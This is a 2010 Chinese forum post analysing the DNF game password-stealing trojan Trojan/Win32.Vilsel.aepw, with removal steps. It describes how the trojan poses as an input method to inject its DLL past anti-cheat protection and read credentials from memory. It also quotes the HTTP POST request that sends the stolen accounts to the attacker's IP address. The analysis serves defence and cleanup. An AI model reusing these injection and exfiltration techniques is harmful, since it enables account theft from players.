flyleaf 发表于 2010-6-8 11:37

Trojan/Win32.Vilsel.aepw分析

一、 病毒标签:
病毒名称: Trojan/Win32.Vilsel.aepw
病毒类型: 盗号木马
文件 MD5: 17BC8D25C35289D410926594AD944A30
公开范围: 完全公开
危害等级: 3
文件长度: 20,669 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG

二、 病毒描述:
    该恶意代码文件为DNF游戏盗号木马,病毒运行之后衍生病毒文件到%System32%目录下命名为2tgfsddaew4refdsd.ime(该后缀名文件为输入法文件)并将该文件改名为随机名*.drv(该后缀名文件为设备驱动程序)后缀名文件,然后再次创建一个2tgfsddaew4refdsd.ime到该目录下,调用输入法API函数来安装创建的病毒文件伪装成(中文(简体)-智能CBA),因为DNF游戏有Tenprotect网游反外挂引擎保护无法正常将DLL注入到该游戏进程中,所以病毒利用该手段通过用户切换输入法方式将病毒DLL注入进游戏进程中,衍生2个DLL文件之后,查找类名"TWINCONTROL"标题名为"地下城与勇士"、"地下城勇士"的窗口,找到之后向该窗口发送关闭消息,调用"rundll32.exe"来加载2tgfsddaew4refdsd.ime文件,将病毒文件注入到Explorer.exe、conime.exe进程中,释放批处理文件删除病毒原文件,病毒DLL文件分析:判断自身模块是否在DNF进程中,并获取DNF窗口相关信息,通过内存技术截取账号密码,将获取的账号密码发送到作者指定的地址中。

三、 行为分析:
本地行为:
1、文件运行后会释放以下文件
%System32%\msimg32.new
%System32%\2tgfsddaew4refdsd.ime
%System32%\msimg32.dll

2、调用输入法API函数来安装创建的病毒文件伪装成(中文(简体)-智能CBA),因为DNF游戏有Tenprotect网游反外挂引擎保护无法正常将DLL注入到该游戏进程中,所以病毒利用该手段通过用户切换输入法方式将病毒DLL注入进游戏进程中

3、判断自身模块是否在DNFchina.exe、QQLogin.exe、DNF.exe如果是则调用输入法API函数ImmInstallIME安装病毒衍生的输入法后缀的文件,循环获取当前窗口类名是否为"TWINCONTROL",如果是则获取窗口的相关信息,判断窗口返回的32位长整型值是否为3590455296,如果是则获取窗口的尺寸大小,判断窗口大小是否为400*300,如果是则获取该窗口的父窗口,获取窗口的内存地址,从内存地址1000处开始匹配24字节的数据是否是:28000000290000000A0000000F0000001000000011000000,通过内存技术将获取的游戏账号和密码通过POST方式发送到作者指定的地址中

网络行为:
通过内存技术将获取的游戏账号和密码通过POST方式发送到作者指定的地址中
POST /send.asp?%s HTTP/1.1
Accept: */*..C
ontent-Type: app
lication/x-www-form-urlencoded..
Accept-Encoding:gzip, deflate..
Host: 121.10.107.190
Content-Length: %d..Connection: close.

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%= C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\                           WINDODWS所在目录
%DriveLetter%\                        逻辑驱动器根目录
%ProgramFiles%\                        系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\        当前用户文档根目录

四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1)使用ATOOL管理工具,进程管理卸载被注入的病毒模块2tgfsddaew4refdsd.ime
(2) 删除病毒文件
%System32%\msimg32.new
%System32%\2tgfsddaew4refdsd.ime
%System32%\msimg32.dll
(3)删除病毒添加的CBA输入法
右键鼠标点击右下角输入法—设置—选择病毒添加的(中文(简体)-智能CBA)然后删除即可
页: [1]
查看完整版本: Trojan/Win32.Vilsel.aepw分析